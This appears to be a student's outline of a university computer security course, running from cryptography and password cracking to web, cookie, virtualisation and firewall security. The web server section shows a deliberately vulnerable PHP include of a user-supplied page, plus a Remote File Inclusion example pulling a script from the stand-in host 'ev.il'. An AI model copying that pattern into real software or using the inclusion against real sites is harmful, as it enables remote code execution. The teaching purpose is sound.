1. Fundamentals

Features of Computer Security

There is no such thing as absolute computer security
Theory is not equal to practice

CIA Triangle

Confidentiality

Integrity

Availability

Security Incidents

1. Malware - The Morris Worm
2. Denial of Service (DoS) attack on GitHub
3. DDoS Attack on Amazon
4. Hacktivism
5. Megaupload Incident
6. Social Engineering
7. Physical Security
Analysing Security Incidents
  1. Who did it?
  2. Motivation - why might they be doing it?
  3. Attack vector
  4. Damage (which security aspect is breached)
  5. What should be done to prevent the attack or mitigate the damage?

Basic Terminologies

Asset
Vulnerability
Threat
ThreatSecurity Aspect
SpoofingAuthentication
TamperingIntegrity
RepudiationNon-repudiation
Information disclosureConfidentiality
Denial of ServiceAvailability
Elevation of PrivilegeAuthorisation
Attack
Risk
Countermeasure
Trust

Risk Analysis and Handling

Informal Risk Analysis
Qualitative Methods

Screenshot

Quantitative Methods

Screenshot

Strategies to Handle Risks
  1. Fix the vulnerabilities
  2. Risk acceptance
  3. Risk avoidance
  4. Risk transference
  5. Detection
  6. Reaction

2. Secret Key Encryption

Overview

Terminology

Plaintext

Ciphertext

Encryption / Decryption

Cipher

Cryptography

Types of Encryption

Secret Key Encryption

Public Key Encryption

Secret Key Cryptography

Overview

Screenshot

Technique 1 - Steganography

Overview
Why is it used?
Process:
How to hide data in an image
Example of LSB Insertion

Technique 2 - Code Words

Technique 3 - Change the Order of Letters

Technique 4 - Substitution

4a - Monoalphabetic Substitution Cipher

Frequency Analysis

4b - Polyalphabetic Substitution Cipher

Screenshot

Methods of Implementing Polyalphabetic Substitution Ciphers
4c - Non-Repeating, Different Substitutions

Principles of Good Encryption

1. Confusion
2. Diffusion
3. Hard to break even with MOST GENEROUS ASSUMPTIONS
4. Management of encryption scheme is feasible and cost-effective

Data Encryption Standard (DES)

Data Encryption Standard

Block vs Stream Cipher

Screenshot

Specification

The Feistel Approach Overview

Screenshot

Algorithm
  1. Plaintext block is split into two equal parts (L_0, R_0) each of 32 bits
  2. Run one side of the pair through a feistel function that is fed a key K_0.
  3. The output of this function, R_0K_0 is XORed with the other half L_0
  4. The output of this XOR is used as the input of the round function for the next round, while the initial R_0 will be XORed with this 2nd round function output
  5. This continues for a total of 16 rounds, where the final blocks are the ciphertext
Characteristic of Feistel Cipher

Subkey Generation

Screenshot

Algorithm
Permuted Choice 1
  1. Drops the 8th bit of each of the eight 8-bit blocks, as they are the parity bits
  2. Permute the remaining 56 bits
Permuted Choice 2

Round Function (Feistel Function)

Screenshot

There are 4 operations in this function
  1. Expansion

  2. Key Combination

  3. Substitution

  4. Permutation

Summary of DES

Advanced Encryption Standard (AES)

Advanced Encryption Standard

Overview
Algorithm

Matrix Operations

Screenshot

1. Substitution -SubBytes

Screenshot

2. Permutation - ShiftRows

Screenshot

3. Mixing - MixColumns

Screenshot

4. Round Key - AddRoundKey

Security

AES is a lot more secure than DES

Common Secret Key Encryption Algorithms

Screenshot

3. Public Key Encryption

Public Key Encryption

Motivation
Public Key Encryption

Modular Arithmetic

Congruence
Properties of Modular Arithmetic
  1. (A+B) \bmod n \equiv ((A \bmod n) + B) \bmod n
  2. (A + B) \bmod n \equiv ((A \bmod n) + B \bmod n) \bmod n
  3. (A \times B) \bmod n \equiv ((A \bmod n) \times B) \bmod n
  4. (A \times B) \bmod n \equiv ((A \bmod n) \times (B \bmod n)) \bmod n
  5. x^{A \times B} \bmod n \equiv (x^A \bmod n)^B \bmod n
  6. (x^A \bmod n)^B \bmod n \equiv (x^B \bmod n)^A \bmod n
One Way Functions
Primitive Roots

RSA Encryption Algorithm

Overview
Generating the Public Key
Message Encryption
Generating the Private Key
Finding d
Ciphertext Decryption
Example

Security of RSA

Public vs Secret Key encryption

DES is between 1000 and 10000 times faster than RSA (encryption & decryption)

SecretPublic
Uses XOR, substitution, permutation - fastUses a one-way function - slower
Key is secret, attacker knows less information and hence requires shorter key for same level of securityOnly relies on the length of the public key to prevent the crack with brute force
Faster to perform operations on a shorter keyThe longer the key, the slower the operation
Key distribution is complicatedKey distribution is easy

4. Digital Signature & Certificates

Digital Signatures

Integrity, Authentication, Non-repudiation

Symmetry of Public Key Encryption
Terminology
Methodology

Digital Signatures

Motivation
Methodology
  1. Calculate the hash of the message (aka. digest)
  2. Encrypt the hash using the private key. This is the digital signature
Verification
Encryption vs Digital Signature
Encryption SchemeDigital Signature
Maintains confidentialityProvide integrity check, authentication and non-repudiation
Can recover plaintextCannot recover plaintext

Message Authentication Code (MAC)

Overview
Motivation

Digital Certificates

Digital Certificates

Overview
Format
O=University of Warwick, 
OU=Department of Computer Science, 
CN=Ligang He 
Authentication through certificates
  1. A asks for B’s certificate, and B sends it over
  2. A uses the CA’s public key to verify B’s certificate
  3. If B’s certificate is genuine, B’s public key contained in B’s certificate is genuine

Screenshot

Strong Authentication with Certificate

Screenshot

Authentication Chain

Screenshot

Web of Trust

Overview
Determining Validity
Trust Requirements
Distance Requirements

Certificate Authority vs Web of Trust

Certificate Authority
Web of Trust
Certificate AuthorityWeb of Trust
More convenient for end user as CA’s are assumed to be trustworthyLess conveinent for end users as they continually assess the relaibility of certificates
If one CA certificate is compromised, the attacker can impersonate any site on the internet as all CAs have the authority to sign any certificateIntegrity of WoT depends on how well maintained it is by its users
Usually one authentication chain for any certificate, so every chain has a single point of failureUsually has multiple signature chains for one certificate, so a particular certificate is more trustworthy

Cryptographic Hashing

Overview

Hash Function: SHA-256

  1. The message is padded to make the message length a multiple of 512
  2. Message divided into blocks of 512 bits
  3. 64 words are generated from each block, each word is 32 bits
  4. 8 H variables are initialised
  5. Each message block is processed one at a time, and the H variables are added
  6. The hash of the message is the bitwise-concatenation of all the H variables.

Hashing in Practice

5. Password Authentication

Authentication

Passwords

Overview
Attacks related to Passwords
The problem with passwords
People’s tendency in setting passwords
User Overload
Possible Solutions

Password Cracking

Cracking Speed
PasswordCombinations (C)
26 characters - length 426^4 = 456976
52 characters - length 452^4 = 7.3 \times 10^6
94 characters - length 894^8 = 6.1 \times 10^{15}
HashUsingSpeed
MD5Good PC10^7 guess/s
SHA256Good PC10^6 g/s
MD5PC + Graphics Card10^{10} g/s
SHA 256PC + Graphics Card10^9 g/s
Entropy
Human-Generated Passwords

Storing Passwords

Other Authentication Methods

BiometricFalse PositiveFalse Negative
Face1%10%
Fingerprint1%0.1%
Hand Geometry2%0.1%
Iris0.94%0.99%
Retina0.0001%0.2%
Keystrokes7%0.1%
Voices2%10%

6. Secure Email

Terminology

How email is delivered

  1. User begins by using the email client, which connets to the SMTP server and sends the server the email address of the recipient, the name of the sender and the body of the message
  2. If the domain of recipient and sender are identical, the SMTP server hands the message to the PoP3 or IMAP server for that particular domain
  3. Otherwise, SMTP communicates with the Domain Name Server (DNS) for the IP address of the SMTP server in the other domain.
  4. The SMTP server at the sender’s side sends the email message to the SMTP server at the recipient’s end, which then hands the message to the PoP3 server for the recipient’s domain

General Security Issues in Emails

Overview
  1. Email is free - encourages spam, DoS attacks
  2. Email can carry paylods (viruses)
  3. Email is easy to spoof (if there is no authentication)
Email Servers

Screenshot

Solutions to Problems

Spam
Payloads
Spoofing
Interception

Diagram of PGP Encryption Scheme

7. Password Cracking

Methods

There are a few methods of cracking a password hash:

Brute Force and Dictionary Attacks

Brute Force Attacks

Dictionary Attacks

Lookup Tables

Reverse Lookup Tables

Problem with Dictionary Attack and Lookup Tables

What Reverse Lookup Tables do

Uses a technique called a hash chain

Reduction Functions

\text{The only requirement for the reduction function is to return a value in P, other than that it can be anything}

Constructing the Hash Chain

p_1 \to h_1 \to p_2 \to h_2 \to p_3 \to h_3 \to p_4

Cracking Passwords

Example - Cracking Hashes

Starting PasswordEnding Password
helloe#,OO
waltz<[X|j
closeSM-Jb
proxyrnbq^
which|Us5,

False Alarms

This is the main problem with RLT - hash chain collisions that we call false alarms

\text{Chain 1:} \hspace{1em} p_1 \to h_1 \to p_2 \to h_2 \to p_3 \to h_3 \to p_4

\text{Chain 2:} \hspace{1em} p'_1 \to h'_1 \to p'_p2 \to h'_2 \to p_2 \to h_2 \to p_3

Rainbow Table

h (R_k \to) p'_1 (R_1 \to) ... (R_2 \to) ... (R_{k-1} \to) ...

Screenshot

Defence

Password Salting

Login Verification

Defending against Table Attacks

In order for the lookup table attack to succeed, an attacker needs to precompute the tables.

H(p + s_1), H(p + s_2), ..., H(p + s_n)

When the salt is large, e.g. 48 bits, the required storage space will be too big for the attack to be worthwhile**

Storing Passwords in Linux

When a user is created, their info is stored in the /etc/passwd file and their hash + salt is stored in the /etc/shadow file. Only the user can read passwd and only root can read shadow.

Password File

Screenshot

Shadow File

$6$JVGtK2Il$/s.5q4M1WN/ekw2rM26OHId9TPELOcPMmHG.E7zCzSbalzVPgPPGUIB7f7/2mTfj/Lg3RgoKhAkcsBDkJGAN.1:18554:0:99999:7:::

Unix Protection Rules

8. Access Control

Access control specifies what subject has what permission to access which object and enforces the permissions

Terminologies:

General procedure of access control

Principles of Access Control

  1. Principle of Least Privilege
  2. Principle of Fail-safe Defaults

Discretionary Access Control (DAC)

Controls are set by the owners

Specifying the Permissions

Storing the Permissions

Access Matrix
Access Control List (ACL)
Capability List

DAC Implementation in Operating Systems

Linux
Operating Systems that use ACL
Operating Systems that use Capability Lists

Mandatory Access Control (MAC)

An “across the board” policy that is enforced by the system. Often achieved with multi-level security

Terminology

Security Labels

Examples

Lattice Structure

Access Rules

No read up, and no write down

TLDR

Why do we need to form a lattice?

Flow of Information

Screenshot Screenshot

Implementation of MAC in Linux

9. Security & Authentication over Networks

A->B: M1
B->A: M2

Authentication at a Distance

Replay Attack

A->B: [A]_Alice
B->A: B
Solution 1 - Session Token
A->B : A
B->A : R
A->B : [R]_Alice
Solution 2 - Timestamping

Mutual Authentication

A->B : I'm Alice, R_A
B->A : R_B, [R_A]_Bob
A-> B: [R_B]_Alice
Using Digital Signature
A->B : "I'm Alice"
B->A : R
A->B : [R]_Alice
Using Public Key Encryption:
A->B : "I'm Alice"
B->A : {R}_KPAlice
A -> B : R

Man in the Middle Attack (Relay Attack)

Solution

Digital Signature

A->B : A
B->A : R
A->B : [R, E]_A

Encryption - this is also known as the Needham-Schroeder Authentication Protocol (public key variant)

A->B : A
B->A : {B, R}_KPA
A->B : R

Diffie-Hellman-Merkel (DHM) Key Exchange Protocol

10. Web Server Security Issues

Background

Interaction between Client and Web Server

HTTP Request

GET /docs/index/.html HTTP/1.1
Host: www.nowhere123.com
Accept: image/gif, image/jpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozzila/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
{blank line}

HTTP Request Methods

How HTTP Server Processes Requests

Listening
Processing

PHP

Dynamic File Loading
<?php include $_GET['page']".html"; ?>

Security Issues

Remote File Inclusion (RFI) Vulnerability

include http://ev.il/badscript.php?.html

Forms

Call OS commands in PHP

Path Exploits

Robot Exclusion Protocol

User-agent:* # apply to all robots
Disallow:/local/secure.html

User-agents:Googlebot # apply only to Googlebot
Disallow:/private/

11. Security with Cookies

Overview of Cookies

Web Service is stateless

What are Cookies

Setting Cookies

Screenshot

HTTPS Protocol

Screenshot

TLS / SSL

  1. Client sends an initial message to the server to agrree on key, encryption method and hash function.
  2. Client generates digital signature or MAC, encrypts message + DS/MAC and sends them to the server.
  3. Server decrypts them and verifies the integrity

Accessing Cookies

JavaScript

PHP

Security of Cookies, Session

Session

Algorithm

  1. When client visits the same page or subpage, it sends the http request with the session id in the cookie
  2. When the server receives the request, it looks up the session id in the session data structure. If the session id exists, the client is authenticated
  3. (and 4) Server runs code to obtain data related to the client
  4. Server creates the webpage based on the data obtained
  5. Server composes and sends the http response message

Screenshot

Cookies-Related Security Attacks

Network Eavesdropping and Cookie Hijacking

Third Party Cookies

XSS (Cross-Site Scripting)

Phishing False Sub-Domain

Cross-Site Request Forgery (CSRF)

12. Security with Virtualisation

Virtualisation

Terminologies

Architecture

The OS sits between the hardware and its applications and manages the interaction between application and hardware resources. It is the lowest level software in a machine.

Screenshot

Embedded

Screenshot

Non-Embedded

Screenshot

Abstraction of Physical Resources

Life Cycles of VMs

Impact of Virtualisation on Security

1. Isolated

2. Transient

Advantages

Phyiscal servers are often always on while VMs can be started very quickly and remotely

Disadvantages

When virus hits conventional networks of physical machines, admins often do the following:

3. State Restoring

Advantages

The virtual disk for a VM is stored as a file on the hypervisor. This allows the hypervisor to record changes to the contents of the virtual disk

Disadvantages - Protection
Disadvantages - Security Patches
Disadvantages - Vulnerability
Disadvantages - Data Lifetime

A fundamental principle for building secure systems is minimising the amount of time that sensitive data remains in a system

4. Low Privilege

In a physical computer, OS is the software with the highest privilege in the computer

Advantages

5. Mobile

Disadvantages

VMS are not physical, everything about VM is virtualised as files - makes theft of data easier

6. Easy to Create

In a traditional network of physical machines, all machines have the same configurations. When there are security vulnerabilities, the same security measure can be applied to all machines

Disadvantages

7. Lack of Identity

Disadvantages

In a traditional environment, a machine can be identified by MAC address, Ethernet port number. Used as a mechanism of non-repudiation - the system has the mechanism to check who did something

Other Security Issues

Hypervisor Intrusion

If the hypervisor is compromised, the attacker can access all the VMs

Security due to Inter-VM communication

“VM-to-VM” attacks means that attackers use one VM to access or control other VMs on the same hypervisor

Denial of Service

An improperly configured hypervisor can allow a single VM to consume all resources, starving other running VMs

13. Security with Firewalls

Network Structure Basics

Firewalls

Network Structure

Switch vs Router

OSI 7 Layer Model

LayerData UnitInformation Added
Application (7)DataApplication-specific data (e.g. HTTP, SSH)
Presentation (6)DataData formatting (e.g. convert to binary), encryption (e.g. TLS)
Session (5)DataSession ID, sync info (SYN, SYN-ACK, ACK)
Transport (4)SegmentSource/destination ports, sequence numbers
Network (3)PacketSource/destination IP addresses
Data Link (2)FrameMAC Addresses
Physical (1)BitsConvert bits to electrical signals

Firewall Traffic Filtering Methods

Packet Filtering

Stateful Inspection

Proxy Service

Application-Level Filters

Host-Based Application Firewall